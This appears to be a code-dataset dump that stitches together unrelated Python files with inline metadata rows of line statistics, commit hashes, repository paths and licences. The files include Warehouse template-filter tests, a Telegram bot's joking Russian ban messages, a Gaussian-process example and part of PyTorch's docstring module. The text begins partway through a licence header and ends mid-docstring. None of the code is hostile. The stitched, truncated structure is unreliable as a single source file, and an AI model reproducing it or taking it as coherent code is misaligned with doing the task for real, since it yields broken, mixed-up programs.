# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import datetime
import urllib.parse
from functools import partial
import packaging.version
import pretend
import pytest
from warehouse import filters
def test_camo_url():
request = pretend.stub(
registry=pretend.stub(
settings={"camo.url": "https://camo.example.net/", "camo.key": "fake key"}
)
)
c_url = filters._camo_url(request, "http://example.com/image.jpg")
assert c_url == (
"https://camo.example.net/b410d235a3d2fc44b50ccab827e531dece213062/"
"687474703a2f2f6578616d706c652e636f6d2f696d6167652e6a7067"
)
class TestCamoify:
def test_camoify(self):
html = "<img src=http://example.com/image.jpg>"
request = pretend.stub(
registry=pretend.stub(
settings={
"camo.url": "https://camo.example.net/",
"camo.key": "fake key",
}
)
)
camo_url = partial(filters._camo_url, request)
request.camo_url = camo_url
ctx = {"request": request}
result = filters.camoify(ctx, html)
assert result == (
'<img src="https://camo.example.net/'
"b410d235a3d2fc44b50ccab827e531dece213062/"
'687474703a2f2f6578616d706c652e636f6d2f696d6167652e6a7067">'
)
def test_camoify_no_src(self, monkeypatch):
html = "<img>"
request = pretend.stub(
registry=pretend.stub(
settings={
"camo.url": "https://camo.example.net/",
"camo.key": "fake key",
}
)
)
camo_url = partial(filters._camo_url, request)
request.camo_url = camo_url
ctx = {"request": request}
gen_camo_url = pretend.call_recorder(
lambda curl, ckey, url: "https://camo.example.net/image.jpg"
)
monkeypatch.setattr(filters, "_camo_url", gen_camo_url)
result = filters.camoify(ctx, html)
assert result == "<img>"
assert gen_camo_url.calls == []
@pytest.mark.parametrize(
("inp", "expected"),
[
(1, "1"),
(999, "999"),
(1234, "1.23k"),
(4304264, "4.3M"),
(7878123132, "7.88G"),
(9999999999999, "10T"),
],
)
def test_shorten_number(inp, expected):
assert filters.shorten_number(inp) == expected
@pytest.mark.parametrize(
("inp", "expected"),
[({"foo": "bar", "left": "right"}, '{"foo":"bar","left":"right"}')],
)
def test_tojson(inp, expected):
assert filters.tojson(inp) == expected
def test_urlparse():
inp = "https://google.com/foo/bar?a=b"
expected = urllib.parse.urlparse(inp)
assert filters.urlparse(inp) == expected
@pytest.mark.parametrize(
("inp", "expected"),
[
(
"'python', finance, \"data\", code , test automation",
["python", "finance", "data", "code", "test automation"],
),
(
"'python'; finance; \"data\"; code ; test automation",
["python", "finance", "data", "code", "test automation"],
),
("a \"b\" c d 'e'", ["a", "b", "c", "d", "e"]),
(" ' ' \" \"", []),
],
)
def test_format_tags(inp, expected):
assert filters.format_tags(inp) == expected
@pytest.mark.parametrize(
("inp", "expected"),
[
(
["Foo :: Bar :: Baz", "Foo :: Bar :: Qux", "Vleep"],
[("Foo", ["Bar :: Baz", "Bar :: Qux"])],
),
(
["Vleep :: Foo", "Foo :: Bar :: Qux", "Foo :: Bar :: Baz"],
[("Foo", ["Bar :: Baz", "Bar :: Qux"]), ("Vleep", ["Foo"])],
),
],
)
def test_format_classifiers(inp, expected):
assert list(filters.format_classifiers(inp).items()) == expected
@pytest.mark.parametrize(
("inp", "expected"), [("Foo", "Foo"), ("Foo :: Foo", "Foo_._Foo")]
)
def test_classifier_id(inp, expected):
assert filters.classifier_id(inp) == expected
@pytest.mark.parametrize(
("inp", "expected"),
[
(["abcdef", "ghijkl"], False),
(["https://github.com/example/test", "https://pypi.io/"], True),
(["abcdef", "https://github.com/example/test"], True),
],
)
def test_contains_valid_uris(inp, expected):
assert filters.contains_valid_uris(inp) == expected
@pytest.mark.parametrize(
("inp", "expected"),
[
("bdist_dmg", "OSX Disk Image"),
("bdist_dumb", "Dumb Binary"),
("bdist_egg", "Egg"),
("bdist_msi", "Windows MSI Installer"),
("bdist_rpm", "RPM"),
("bdist_wheel", "Wheel"),
("bdist_wininst", "Windows Installer"),
("sdist", "Source"),
("invalid", "invalid"),
],
)
def test_format_package_type(inp, expected):
assert filters.format_package_type(inp) == expected
@pytest.mark.parametrize(
("inp", "expected"), [("1.0", packaging.version.Version("1.0"))]
)
def test_parse_version(inp, expected):
assert filters.parse_version(inp) == expected
@pytest.mark.parametrize(
("inp", "expected"),
[
(
datetime.datetime(2018, 12, 26, 13, 36, 5, 789013),
"2018-12-26 13:36:05.789013 UTC",
)
],
)
def test_localize_datetime(inp, expected):
datetime_format = "%Y-%m-%d %H:%M:%S.%f %Z"
assert filters.localize_datetime(inp).strftime(datetime_format) == expected
| 28.180095
| 86
| 0.568954
|
c1147746aa6d8e6306419e65f58906a35e32e752
| 785
|
py
|
Python
|
modules/voteban/consts.py
|
Kylmakalle/assistant-bot
|
71c0f488a3dfb370ef2a87bbba83862b061c772a
|
[
"MIT"
] | 4
|
2020-02-05T14:05:08.000Z
|
2021-09-12T17:43:04.000Z
|
modules/voteban/consts.py
|
Kylmakalle/assistant-bot
|
71c0f488a3dfb370ef2a87bbba83862b061c772a
|
[
"MIT"
] | 6
|
2019-03-20T07:42:26.000Z
|
2022-01-06T17:56:47.000Z
|
modules/voteban/consts.py
|
Kylmakalle/assistant-bot
|
71c0f488a3dfb370ef2a87bbba83862b061c772a
|
[
"MIT"
] | 5
|
2019-06-22T06:32:41.000Z
|
2022-01-02T16:10:51.000Z
|
from aiogram.utils.callback_data import CallbackData
import random
voter = CallbackData('voter', 'chat_id', 'user_id')
from modules.captcha_button.consts import LogEvents
class LogEvents(LogEvents):
UNMEDIA = 'unmedia'
VOTEBAN = 'voteban'
BAN = 'BAN'
TEMPBAN = 'TEMPBAN'
KICK = 'KICK'
ADMIN_REPORT_RESPONSES = [
'Маленький шаг в сторону бана, анимешник.',
'Так-так, что тут у нас? Образованный, революционер...',
'Telegram не любит амдшников.',
'План по репортам за день выполнен, пора банить.',
'Пойди это Петровичу расскажи.',
'Вот ты и попался, анимешник!',
'Вскрывайся, амудешник!',
'Заслуженный бан за свиней!',
'W A S T E D'
]
def get_admin_report_response():
return random.sample(ADMIN_REPORT_RESPONSES, 1)[0]
| 24.53125
| 60
| 0.689172
|
81e3b02ed34e17640e60f38b1f16c4743b8de174
| 408
|
py
|
Python
|
astoria/consumers/astctl/usercode/__init__.py
|
sedders123/astoria
|
d1e9603b10d765aed4c1237e79b5ab48a9af1d83
|
[
"MIT"
] | 1
|
2021-02-03T02:54:54.000Z
|
2021-02-03T02:54:54.000Z
|
astoria/consumers/astctl/usercode/__init__.py
|
sedders123/astoria
|
d1e9603b10d765aed4c1237e79b5ab48a9af1d83
|
[
"MIT"
] | 72
|
2020-12-15T18:29:18.000Z
|
2022-03-08T09:42:53.000Z
|
astoria/astctl/usercode/__init__.py
|
trickeydan/astoria
|
ef08ed4be4d5997751846b0cadce9aa8261ae151
|
[
"MIT"
] | 2
|
2022-02-05T23:00:51.000Z
|
2022-03-09T21:40:49.000Z
|
"""Commands to interact with usercode."""
import click
from .kill import kill
from .log import log
from .restart import restart
from .show import show
from .trigger import trigger
@click.group("usercode")
def usercode() -> None:
"""Interact with Usercode."""
usercode.add_command(kill)
usercode.add_command(log)
usercode.add_command(restart)
usercode.add_command(show)
usercode.add_command(trigger)
| 19.428571
| 41
| 0.769608
|
a77057856425bd6bf62713853236f5dbe0558c67
| 418
|
py
|
Python
|
tests/test_beholder.py
|
mickevi/beholder
|
b6ca4cbecca1540d65a62fd7d2ae8c86412ae88d
|
[
"0BSD"
] | null | null | null |
tests/test_beholder.py
|
mickevi/beholder
|
b6ca4cbecca1540d65a62fd7d2ae8c86412ae88d
|
[
"0BSD"
] | null | null | null |
tests/test_beholder.py
|
mickevi/beholder
|
b6ca4cbecca1540d65a62fd7d2ae8c86412ae88d
|
[
"0BSD"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
test_beholder
----------------------------------
Tests for `beholder` module.
"""
import unittest
from beholder import beholder
class TestBeholder(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_000_something(self):
pass
if __name__ == '__main__':
import sys
sys.exit(unittest.main())
| 13.483871
| 38
| 0.58134
|
57a22ac01f3dcabedf7a4d50e4f3c04be8df3f1b
| 39
|
py
|
Python
|
blog/__init__.py
|
EvaZogg/DjangoTranslationWebsite
|
3946c052547deed216332cb316f48fc70c09ff22
|
[
"BSD-2-Clause"
] | null | null | null |
blog/__init__.py
|
EvaZogg/DjangoTranslationWebsite
|
3946c052547deed216332cb316f48fc70c09ff22
|
[
"BSD-2-Clause"
] | null | null | null |
blog/__init__.py
|
EvaZogg/DjangoTranslationWebsite
|
3946c052547deed216332cb316f48fc70c09ff22
|
[
"BSD-2-Clause"
] | null | null | null |
def blog_view(request):
return None
| 19.5
| 23
| 0.74359
|
2fb85a9bc16cdfc1624ed7d0262a4bb36446266f
| 1,232
|
py
|
Python
|
tensorflow_toolkit/image_retrieval/image_retrieval/frames_provider.py
|
morkovka1337/openvino_training_extensions
|
846db45c264d6b061505213f51763520b9432ba9
|
[
"Apache-2.0"
] | 256
|
2020-09-09T03:27:57.000Z
|
2022-03-30T10:06:06.000Z
|
tensorflow_toolkit/image_retrieval/image_retrieval/frames_provider.py
|
morkovka1337/openvino_training_extensions
|
846db45c264d6b061505213f51763520b9432ba9
|
[
"Apache-2.0"
] | 604
|
2020-09-08T12:29:49.000Z
|
2022-03-31T21:51:08.000Z
|
tensorflow_toolkit/image_retrieval/image_retrieval/frames_provider.py
|
morkovka1337/openvino_training_extensions
|
846db45c264d6b061505213f51763520b9432ba9
|
[
"Apache-2.0"
] | 160
|
2020-09-09T14:06:07.000Z
|
2022-03-30T14:50:48.000Z
|
"""
Copyright (c) 2019 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import cv2
class FramesProvider:
def __init__(self, images_list_path):
self.impaths = []
self.probe_classes = []
with open(images_list_path) as f:
content = [line.strip().split() for line in f.readlines() if line.strip()]
root = os.path.dirname(images_list_path)
for impath, label in content:
self.impaths.append(os.path.join(root, impath))
self.probe_classes.append(int(label))
def __iter__(self):
for impath, probe_class in zip(self.impaths, self.probe_classes):
image = cv2.imread(impath)
yield image, probe_class
| 30.8
| 86
| 0.691558
|
6c848c6c86c3c2dcc68bd1365293553e5b2aeb40
| 1,837
|
py
|
Python
|
examples/ex/ex_sim.py
|
tonyduan/gp-lib
|
8febaab91cad8b6435791fa5f0673b0c033c0101
|
[
"MIT"
] | 4
|
2019-05-02T21:31:48.000Z
|
2021-10-03T03:23:46.000Z
|
examples/ex/ex_sim.py
|
tonyduan/gaussian-processes
|
8febaab91cad8b6435791fa5f0673b0c033c0101
|
[
"MIT"
] | null | null | null |
examples/ex/ex_sim.py
|
tonyduan/gaussian-processes
|
8febaab91cad8b6435791fa5f0673b0c033c0101
|
[
"MIT"
] | 1
|
2021-10-03T03:23:53.000Z
|
2021-10-03T03:23:53.000Z
|
import numpy as np
from argparse import ArgumentParser
from sklearn.datasets import load_breast_cancer, load_iris, load_boston, load_wine
from sklearn.model_selection import train_test_split
from sklearn.metrics import r2_score, roc_auc_score
from gp_lib.gp import ConstantMeanGP
from gp_lib.kernels import *
if __name__ == "__main__":
np.random.seed(123)
argparser = ArgumentParser()
argparser.add_argument("--lr", type=float, default=1.0)
argparser.add_argument("--r2", type=float, default=0.75)
argparser.add_argument("--tol", type=float, default=1e-3)
argparser.add_argument("--m", type=int, default=1000)
argparser.add_argument("--n", type=int, default=100)
argparser.add_argument("--verbose", action="store_true")
args = argparser.parse_args()
x = np.random.randn(args.m, args.n)
x = np.c_[x, np.ones(args.m)]
theta = np.random.randn(args.n + 1)
y = x @ theta / args.n ** 0.5 + (1 / args.r2 - 1) ** 0.5 * np.random.randn(args.m)
x_tr, x_te, y_tr, y_te = train_test_split(x, y)
# kernel = SumKernel([SEKernel(dims=np.array([i])) for i in range(x.shape[1])])
# kernel = SEKernel()
kernel = ProductKernel([DotProductKernel(), ConstantKernel()])
gp = ConstantMeanGP(0, kernel, 1 - args.r2)
prev_marginal_loglik = float("-inf")
theta = gp.kernel.get_theta()
for i in range(500):
marginal_loglik, grad = gp.fit(x_tr, y_tr, eval_gradient=True)
theta = theta + 1.0 * grad
gp.kernel.set_theta(theta)
print(f"Iteration {i}: {marginal_loglik:.2f}")
if marginal_loglik - prev_marginal_loglik < args.tol:
break
prev_marginal_loglik = marginal_loglik
mean, var = gp.predict(x_te)
print(f"R2: {r2_score(y_te, mean):.2f}")
print(f"RMSE: {((mean - y_te) ** 2).mean() ** 0.5:.2f}")
| 36.019608
| 86
| 0.665759
|
0830520b537b0ee0b5347d7d3dcf8e988eb302ec
| 377,923
|
py
|
Python
|
torch/_torch_docs.py
|
you74674/pytorch
|
06838ce8b16b2cc2f9e903f3ebdd46659a0e66bb
|
[
"Intel"
] | 1
|
2022-01-20T03:49:23.000Z
|
2022-01-20T03:49:23.000Z
|
torch/_torch_docs.py
|
you74674/pytorch
|
06838ce8b16b2cc2f9e903f3ebdd46659a0e66bb
|
[
"Intel"
] | 1
|
2021-08-20T20:09:02.000Z
|
2021-08-20T20:12:59.000Z
|
torch/_torch_docs.py
|
you74674/pytorch
|
06838ce8b16b2cc2f9e903f3ebdd46659a0e66bb
|
[
"Intel"
] | null | null | null |
# -*- coding: utf-8 -*-
"""Adds docstrings to functions defined in the torch._C"""
import re
import torch._C
from torch._C import _add_docstr as add_docstr
def parse_kwargs(desc):
"""Maps a description of args to a dictionary of {argname: description}.
Input:
(' weight (Tensor): a weight tensor\n' +
' Some optional description')
Output: {
'weight': \
'weight (Tensor): a weight tensor\n Some optional description'
}
"""
# Split on exactly 4 spaces after a newline
regx = re.compile(r"\n\s{4}(?!\s)")
kwargs = [section.strip() for section in regx.split(desc)]
kwargs = [section for section in kwargs if len(section) > 0]
return {desc.split(' ')[0]: desc for desc in kwargs}
def merge_dicts(*dicts):
return {x: d[x] for d in dicts for x in d}
common_args = parse_kwargs("""
input (Tensor): the input tensor.
generator (:class:`torch.Generator`, optional): a pseudorandom number generator for sampling
out (Tensor, optional): the output tensor.
memory_format (:class:`torch.memory_format`, optional): the desired memory format of
returned tensor. Default: ``torch.preserve_format``.
""")
reduceops_common_args = merge_dicts(common_args, parse_kwargs("""
dtype (:class:`torch.dtype`, optional): the desired data type of returned tensor.
If specified, the input tensor is casted to :attr:`dtype` before the operation
is performed. This is useful for preventing data type overflows. Default: None.
keepdim (bool): whether the output tensor has :attr:`dim` retained or not.
"""))
multi_dim_common = merge_dicts(reduceops_common_args, parse_kwargs("""
dim (int or tuple of ints): the dimension or dimensions to reduce.
"""), {'keepdim_details': """
If :attr:`keepdim` is ``True``, the output tensor is of the same size
as :attr:`input` except in the dimension(s) :attr:`dim` where it is of size 1.
Otherwise, :attr:`dim` is squeezed (see :func:`torch.squeeze`), resulting in the
output tensor having 1 (or ``len(dim)``) fewer dimension(s).
"""})
single_dim_common = merge_dicts(reduceops_common_args, parse_kwargs("""
dim (int): the dimension to reduce.
"""), {'keepdim_details': """If :attr:`keepdim` is ``True``, the output tensor is of the same size
as :attr:`input` except in the dimension :attr:`dim` where it is of size 1.
Otherwise, :attr:`dim` is squeezed (see :func:`torch.squeeze`), resulting in
the output tensor having 1 fewer dimension than :attr:`input`."""})
factory_common_args = merge_dicts(common_args, parse_kwargs("""
dtype (:class:`torch.dtype`, optional): the desired data type of returned tensor.
Default: if ``None``, uses a global default (see :func:`torch.set_default_tensor_type`).
layout (:class:`torch.layout`, optional): the desired layout of returned Tensor.
Default: ``torch.strided``.
device (:class:`torch.device`, optional): the desired device of returned tensor.
Default: if ``None``, uses the current device for the default tensor type
(see :func:`torch.set_default_tensor_type`). :attr:`device` will be the CPU
for CPU tensor types and the current CUDA device for CUDA tensor types.
requires_grad (bool, optional): If autograd should record operations on the
returned tensor. Default: ``False``.
pin_memory (bool, optional): If set, returned tensor would be allocated in
the pinned memory. Works only for CPU tensors. Default: ``False``.
memory_format (:class:`torch.memory_format`, optional): the desired memory format of
returned Tensor. Default: ``torch.contiguous_format``.
"""))
factory_like_common_args = parse_kwargs("""
input (Tensor): the size of :attr:`input` will determine size of the output tensor.
layout (:class:`torch.layout`, optional): the desired layout of returned tensor.
Default: if ``None``, defaults to the layout of :attr:`input`.
dtype (:class:`torch.dtype`, optional): the desired data type of returned Tensor.
Default: if ``None``, defaults to the dtype of :attr:`input`.
device (:class:`torch.device`, optional): the desired device of returned tensor.
Default: if ``None``, defaults to the device of :attr:`input`.
requires_grad (bool, optional): If autograd should record operations on the
returned tensor. Default: ``False``.
pin_memory (bool, optional): If set, returned tensor would be allocated in
the pinned memory. Works only for CPU tensors. Default: ``False``.
memory_format (:class:`torch.memory_format`, optional): the desired memory format of
returned Tensor. Default: ``torch.preserve_format``.
""")
factory_data_common_args = parse_kwargs("""
data (array_like): Initial data for the tensor. Can be a list, tuple,
NumPy ``ndarray``, scalar, and other types.
dtype (:class:`torch.dtype`, optional): the desired data type of returned tensor.
Default: if ``None``, infers data type from :attr:`data`.
device (:class:`torch.device`, optional): the desired device of returned tensor.
Default: if ``None``, uses the current device for the default tensor type
(see :func:`torch.set_default_tensor_type`). :attr:`device` will be the CPU
for CPU tensor types and the current CUDA device for CUDA tensor types.
requires_grad (bool, optional): If autograd should record operations on the
returned tensor. Default: ``False``.
pin_memory (bool, optional): If set, returned tensor would be allocated in
the pinned memory. Works only for CPU tensors. Default: ``False``.
""")
tf32_notes = {
"tf32_note": """This operator supports :ref:`TensorFloat32<tf32_on_ampere>`."""
}
reproducibility_notes = {
"forward_reproducibility_note": """This operation may behave nondeterministically when given tensors on \
a CUDA device. See :doc:`/notes/randomness` for more information.""",
"backward_reproducibility_note": """This operation may produce nondeterministic gradients when given tensors on \
a CUDA device. See :doc:`/notes/randomness` for more information.""",
"cudnn_reproducibility_note": """In some circumstances when given tensors on a CUDA device \
and using CuDNN, this operator may select a nondeterministic algorithm to increase performance. If this is \
undesirable, you can try to make the operation deterministic (potentially at \
a performance cost) by setting ``torch.backends.cudnn.deterministic = True``. \
See :doc:`/notes/randomness` for more information."""
}
add_docstr(torch.abs, r"""
abs(input, *, out=None) -> Tensor
Computes the absolute value of each element in :attr:`input`.
.. math::
\text{out}_{i} = |\text{input}_{i}|
""" + r"""
Args:
{input}
Keyword args:
{out}
Example::
>>> torch.abs(torch.tensor([-1, -2, 3]))
tensor([ 1, 2, 3])
""".format(**common_args))
add_docstr(torch.absolute,
r"""
absolute(input, *, out=None) -> Tensor
Alias for :func:`torch.abs`
""")
add_docstr(torch.acos, r"""
acos(input, *, out=None) -> Tensor
Computes the inverse cosine of each element in :attr:`input`.
.. math::
\text{out}_{i} = \cos^{-1}(\text{input}_{i})
""" + r"""
Args:
{input}
Keyword args:
{out}
Example::
>>> a = torch.randn(4)
>>> a
tensor([ 0.3348, -0.5889, 0.2005, -0.1584])
>>> torch.acos(a)
tensor([ 1.2294, 2.2004, 1.3690, 1.7298])
""".format(**common_args))
add_docstr(torch.arccos, r"""
arccos(input, *, out=None) -> Tensor
Alias for :func:`torch.acos`.
""")
add_docstr(torch.acosh, r"""
acosh(input, *, out=None) -> Tensor
Returns a new tensor with the inverse hyperbolic cosine of the elements of :attr:`input`.
.. math::
\text{out}_{i} = \cosh^{-1}(\text{input}_{i})
Note:
The domain of the inverse hyperbolic cosine is `[1, inf)` and values outside this range
will be mapped to ``NaN``, except for `+ INF` for which the output is mapped to `+ INF`.
""" + r"""
Args:
{input}
Keyword arguments:
{out}
Example::
>>> a = torch.randn(4).uniform_(1, 2)
>>> a
tensor([ 1.3192, 1.9915, 1.9674, 1.7151 ])
>>> torch.acosh(a)
tensor([ 0.7791, 1.3120, 1.2979, 1.1341 ])
""".format(**common_args))
add_docstr(torch.arccosh, r"""
arccosh(input, *, out=None) -> Tensor
Alias for :func:`torch.acosh`.
""")
add_docstr(torch.index_add, r"""
index_add(input, dim, index, source, *, alpha=1, out=None) -> Tensor
See :meth:`~Tensor.index_add_` for function description.
""")
add_docstr(torch.add, r"""
add(input, other, *, alpha=1, out=None) -> Tensor
Adds :attr:`other`, scaled by :attr:`alpha`, to :attr:`input`.
.. math::
\text{{out}}_i = \text{{input}}_i + \text{{alpha}} \times \text{{other}}_i
""" + r"""
Supports :ref:`broadcasting to a common shape <broadcasting-semantics>`,
:ref:`type promotion <type-promotion-doc>`, and integer, float, and complex inputs.
Args:
{input}
other (Tensor or Number): the tensor or number to add to input.
Keyword arguments:
alpha (Number): the multiplier for :attr:`other`.
{out}
Examples::
>>> a = torch.randn(4)
>>> a
tensor([ 0.0202, 1.0985, 1.3506, -0.6056])
>>> torch.add(a, 20)
tensor([ 20.0202, 21.0985, 21.3506, 19.3944])
>>> b = torch.randn(4)
>>> b
tensor([-0.9732, -0.3497, 0.6245, 0.4022])
>>> c = torch.randn(4, 1)
>>> c
tensor([[ 0.3743],
[-1.7724],
[-0.5811],
[-0.8017]])
>>> torch.add(b, c, alpha=10)
tensor([[ 2.7695, 3.3930, 4.3672, 4.1450],
[-18.6971, -18.0736, -17.0994, -17.3216],
[ -6.7845, -6.1610, -5.1868, -5.4090],
[ -8.9902, -8.3667, -7.3925, -7.6147]])
""".format(**common_args))
add_docstr(torch.addbmm,
r"""
addbmm(input, batch1, batch2, *, beta=1, alpha=1, out=None) -> Tensor
Performs a batch matrix-matrix product of matrices stored
in :attr:`batch1` and :attr:`batch2`,
with a reduced add step (all matrix multiplications get accumulated
along the first dimension).
:attr:`input` is added to the final result.
:attr:`batch1` and :attr:`batch2` must be 3-D tensors each containing the
same number of matrices.
If :attr:`batch1` is a :math:`(b \times n \times m)` tensor, :attr:`batch2` is a
:math:`(b \times m \times p)` tensor, :attr:`input` must be
:ref:`broadcastable <broadcasting-semantics>` with a :math:`(n \times p)` tensor
and :attr:`out` will be a :math:`(n \times p)` tensor.
.. math::
out = \beta\ \text{input} + \alpha\ (\sum_{i=0}^{b-1} \text{batch1}_i \mathbin{@} \text{batch2}_i)
If :attr:`beta` is 0, then :attr:`input` will be ignored, and `nan` and `inf` in
it will not be propagated.
""" + r"""
For inputs of type `FloatTensor` or `DoubleTensor`, arguments :attr:`beta` and :attr:`alpha`
must be real numbers, otherwise they should be integers.
{tf32_note}
Args:
batch1 (Tensor): the first batch of matrices to be multiplied
batch2 (Tensor): the second batch of matrices to be multiplied
Keyword args:
beta (Number, optional): multiplier for :attr:`input` (:math:`\beta`)
input (Tensor): matrix to be added
alpha (Number, optional): multiplier for `batch1 @ batch2` (:math:`\alpha`)
{out}
Example::
>>> M = torch.randn(3, 5)
>>> batch1 = torch.randn(10, 3, 4)
>>> batch2 = torch.randn(10, 4, 5)
>>> torch.addbmm(M, batch1, batch2)
tensor([[ 6.6311, 0.0503, 6.9768, -12.0362, -2.1653],
[ -4.8185, -1.4255, -6.6760, 8.9453, 2.5743],
[ -3.8202, 4.3691, 1.0943, -1.1109, 5.4730]])
""".format(**common_args, **tf32_notes))
add_docstr(torch.addcdiv, r"""
addcdiv(input, tensor1, tensor2, *, value=1, out=None) -> Tensor
Performs the element-wise division of :attr:`tensor1` by :attr:`tensor2`,
multiply the result by the scalar :attr:`value` and add it to :attr:`input`.
.. warning::
Integer division with addcdiv is no longer supported, and in a future
release addcdiv will perform a true division of tensor1 and tensor2.
The historic addcdiv behavior can be implemented as
(input + value * torch.trunc(tensor1 / tensor2)).to(input.dtype)
for integer inputs and as (input + value * tensor1 / tensor2) for float inputs.
The future addcdiv behavior is just the latter implementation:
(input + value * tensor1 / tensor2), for all dtypes.
.. math::
\text{out}_i = \text{input}_i + \text{value} \times \frac{\text{tensor1}_i}{\text{tensor2}_i}
""" + r"""
The shapes of :attr:`input`, :attr:`tensor1`, and :attr:`tensor2` must be
:ref:`broadcastable <broadcasting-semantics>`.
For inputs of type `FloatTensor` or `DoubleTensor`, :attr:`value` must be
a real number, otherwise an integer.
Args:
input (Tensor): the tensor to be added
tensor1 (Tensor): the numerator tensor
tensor2 (Tensor): the denominator tensor
Keyword args:
value (Number, optional): multiplier for :math:`\text{{tensor1}} / \text{{tensor2}}`
{out}
Example::
>>> t = torch.randn(1, 3)
>>> t1 = torch.randn(3, 1)
>>> t2 = torch.randn(1, 3)
>>> torch.addcdiv(t, t1, t2, value=0.1)
tensor([[-0.2312, -3.6496, 0.1312],
[-1.0428, 3.4292, -0.1030],
[-0.5369, -0.9829, 0.0430]])
""".format(**common_args))
add_docstr(torch.addcmul,
r"""
addcmul(input, tensor1, tensor2, *, value=1, out=None) -> Tensor
Performs the element-wise multiplication of :attr:`tensor1`
by :attr:`tensor2`, multiply the result by the scalar :attr:`value`
and add it to :attr:`input`.
.. math::
\text{out}_i = \text{input}_i + \text{value} \times \text{tensor1}_i \times \text{tensor2}_i
""" + r"""
The shapes of :attr:`tensor`, :attr:`tensor1`, and :attr:`tensor2` must be
:ref:`broadcastable <broadcasting-semantics>`.
For inputs of type `FloatTensor` or `DoubleTensor`, :attr:`value` must be
a real number, otherwise an integer.
Args:
input (Tensor): the tensor to be added
tensor1 (Tensor): the tensor to be multiplied
tensor2 (Tensor): the tensor to be multiplied
Keyword args:
value (Number, optional): multiplier for :math:`tensor1 .* tensor2`
{out}
Example::
>>> t = torch.randn(1, 3)
>>> t1 = torch.randn(3, 1)
>>> t2 = torch.randn(1, 3)
>>> torch.addcmul(t, t1, t2, value=0.1)
tensor([[-0.8635, -0.6391, 1.6174],
[-0.7617, -0.5879, 1.7388],
[-0.8353, -0.6249, 1.6511]])
""".format(**common_args))
add_docstr(torch.addmm,
r"""
addmm(input, mat1, mat2, *, beta=1, alpha=1, out=None) -> Tensor
Performs a matrix multiplication of the matrices :attr:`mat1` and :attr:`mat2`.
The matrix :attr:`input` is added to the final result.
If :attr:`mat1` is a :math:`(n \times m)` tensor, :attr:`mat2` is a
:math:`(m \times p)` tensor, then :attr:`input` must be
:ref:`broadcastable <broadcasting-semantics>` with a :math:`(n \times p)` tensor
and :attr:`out` will be a :math:`(n \times p)` tensor.
:attr:`alpha` and :attr:`beta` are scaling factors on matrix-vector product between
:attr:`mat1` and :attr:`mat2` and the added matrix :attr:`input` respectively.
.. math::
\text{out} = \beta\ \text{input} + \alpha\ (\text{mat1}_i \mathbin{@} \text{mat2}_i)
If :attr:`beta` is 0, then :attr:`input` will be ignored, and `nan` and `inf` in
it will not be propagated.
""" + r"""
For inputs of type `FloatTensor` or `DoubleTensor`, arguments :attr:`beta` and
:attr:`alpha` must be real numbers, otherwise they should be integers.
{tf32_note}
Args:
input (Tensor): matrix to be added
mat1 (Tensor): the first matrix to be matrix multiplied
mat2 (Tensor): the second matrix to be matrix multiplied
Keyword args:
beta (Number, optional): multiplier for :attr:`input` (:math:`\beta`)
alpha (Number, optional): multiplier for :math:`mat1 @ mat2` (:math:`\alpha`)
{out}
Example::
>>> M = torch.randn(2, 3)
>>> mat1 = torch.randn(2, 3)
>>> mat2 = torch.randn(3, 3)
>>> torch.addmm(M, mat1, mat2)
tensor([[-4.8716, 1.4671, -1.3746],
[ 0.7573, -3.9555, -2.8681]])
""".format(**common_args, **tf32_notes))
add_docstr(torch.adjoint,
r"""
adjoint(Tensor) -> Tensor
Returns a view of the tensor conjugated and with the last two dimensions transposed.
``x.adjoint()`` is equivalent to ``x.transpose(-2, -1).conj()`` for complex tensors and
to ``x.transpose(-2, -1)`` for real tensors.
Example::
>>> x = torch.arange(4, dtype=torch.float)
>>> A = torch.complex(x, x).reshape(2, 2)
>>> A
tensor([[0.+0.j, 1.+1.j],
[2.+2.j, 3.+3.j]])
>>> A.adjoint()
tensor([[0.-0.j, 2.-2.j],
[1.-1.j, 3.-3.j]])
>>> (A.adjoint() == A.mH).all()
tensor(True)
""")
add_docstr(torch.sspaddmm,
r"""
sspaddmm(input, mat1, mat2, *, beta=1, alpha=1, out=None) -> Tensor
Matrix multiplies a sparse tensor :attr:`mat1` with a dense tensor
:attr:`mat2`, then adds the sparse tensor :attr:`input` to the result.
Note: This function is equivalent to :func:`torch.addmm`, except
:attr:`input` and :attr:`mat1` are sparse.
Args:
input (Tensor): a sparse matrix to be added
mat1 (Tensor): a sparse matrix to be matrix multiplied
mat2 (Tensor): a dense matrix to be matrix multiplied
Keyword args:
beta (Number, optional): multiplier for :attr:`mat` (:math:`\beta`)
alpha (Number, optional): multiplier for :math:`mat1 @ mat2` (:math:`\alpha`)
{out}
""".format(**common_args))
add_docstr(torch.smm,
r"""
smm(input, mat) -> Tensor
Performs a matrix multiplication of the sparse matrix :attr:`input`
with the dense matrix :attr:`mat`.
Args:
input (Tensor): a sparse matrix to be matrix multiplied
mat (Tensor): a dense matrix to be matrix multiplied
""")
add_docstr(torch.addmv,
r"""
addmv(input, mat, vec, *, beta=1, alpha=1, out=None) -> Tensor
Performs a matrix-vector product of the matrix :attr:`mat` and
the vector :attr:`vec`.
The vector :attr:`input` is added to the final result.
If :attr:`mat` is a :math:`(n \times m)` tensor, :attr:`vec` is a 1-D tensor of
size `m`, then :attr:`input` must be
:ref:`broadcastable <broadcasting-semantics>` with a 1-D tensor of size `n` and
:attr:`out` will be 1-D tensor of size `n`.
:attr:`alpha` and :attr:`beta` are scaling factors on matrix-vector product between
:attr:`mat` and :attr:`vec` and the added tensor :attr:`input` respectively.
.. math::
\text{out} = \beta\ \text{input} + \alpha\ (\text{mat} \mathbin{@} \text{vec})
If :attr:`beta` is 0, then :attr:`input` will be ignored, and `nan` and `inf` in
it will not be propagated.
""" + r"""
